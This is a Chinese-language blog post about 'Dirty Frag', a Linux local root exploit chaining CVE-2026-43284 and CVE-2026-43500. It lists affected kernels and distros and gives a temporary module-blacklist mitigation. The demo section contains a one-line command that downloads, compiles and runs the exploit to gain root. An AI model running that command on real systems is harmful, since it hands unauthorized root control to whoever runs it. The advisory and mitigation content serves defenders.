第一部分:痛点与破局
做运维的同学是不是刚补完Dirty Pipe、Copy Fail的补丁刚松口气?有没有碰到过测试环境里普通用户莫名其妙拿到root权限,排查半天找不到原因?最近安全圈炸锅的Dirty Frag漏洞,直接把Linux本地提权的门槛拉到了地平线——只要你有普通用户权限,敲一行命令就能拿到root,几乎所有主流发行版全中。
Dirty Frag是安全研究员@v4bel发现的通用Linux本地提权漏洞,属于Dirty Pipe同系列逻辑漏洞,完全不依赖竞态条件,利用失败也不会导致内核panic,成功率近乎100%。
第二部分:核心特性深挖
1. 高可靠无崩溃利用逻辑
作为Dirty Pipe、Copy Fail同漏洞家族的新成员,Dirty Frag的利用稳定性拉满:
- 确定性逻辑漏洞,完全不依赖时间窗口,不存在概率性利用失败的问题
- 即使利用过程出错,也不会触发内核panic,不会影响线上业务运行
- 利用成本极低,仅需普通用户权限即可触发
2. 双漏洞链式覆盖全场景
研究者之所以链式利用两个CVE,就是为了覆盖所有发行版场景,没有利用盲区:
CVE-2026-43284(xfrm-ESP页缓存写入):提供任意4字节写入原语,绝大多数发行版默认带对应模块,仅需用户命名空间创建权限CVE-2026-43500(RxRPC页缓存写入):不需要用户命名空间权限,Ubuntu默认加载rxrpc.ko模块- 两个漏洞能力互补,完全覆盖所有主流发行版,不受现有Copy Fail mitigation(algif_aead黑名单)的影响,哪怕你已经补了Copy Fail,照样会中招
3. 超长影响周期覆盖9年内核
这个漏洞的影响范围大到离谱:
CVE-2026-43284影响范围:2017-01-17提交的内核版本cac2661c53f3 到 2026-05-05修复的f4c50a4034e6,跨度整整9年CVE-2026-43500影响范围:2023-06-08提交的2dc334f1a63a 到 2026-05-10修复的aa54b1d27fe0- 已验证可成功利用的发行版包括:Ubuntu 24.04.4、RHEL 10.1、openSUSE Tumbleweed、CentOS Stream 10、AlmaLinux 10、Fedora 44等几乎所有主流发行版
第三部分:实战演示
⚠️ 注意:请勿在未获得授权的系统上运行以下代码,仅用于合法安全测试。
一键运行POC提权
git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
利用后清理
运行POC后页缓存会被污染,为了保证系统稳定性,请执行以下命令清理,或者直接重启:
echo 3 > /proc/sys/vm/drop_caches
临时防护方案
如果暂时没法更新内核,可以执行以下命令拉黑漏洞对应模块,临时规避风险:
sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; echo 3 > /proc/sys/vm/drop_caches; true"
第四部分:避坑指南与总结
避坑提醒
- 不要以为补了
Copy Fail就安全:Dirty Frag的触发不依赖algif_aead模块,现有Copy Fail的修复方案对它完全无效 - 利用后一定要清理页缓存:否则可能出现文件读写异常等稳定性问题
- 临时防护只是权宜之计:等对应发行版推送内核补丁后,一定要第一时间更新内核,才是永久修复方案
总结
Dirty Frag是近年来影响范围最广的Linux本地提权漏洞之一,9年的影响跨度、全主流发行版覆盖、极低的利用门槛,所有Linux服务器的运维和安全同学都要第一时间排查。如果你是渗透测试人员,这个POC也可以加入你的武器库,合法测试目标系统的安全性。
想要看完整的技术分析和披露时间线,可以去项目仓库查看官方writeup文档哦。